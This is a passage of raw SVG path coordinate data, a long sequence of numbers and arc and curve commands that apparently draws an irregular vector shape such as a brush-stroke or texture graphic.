4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-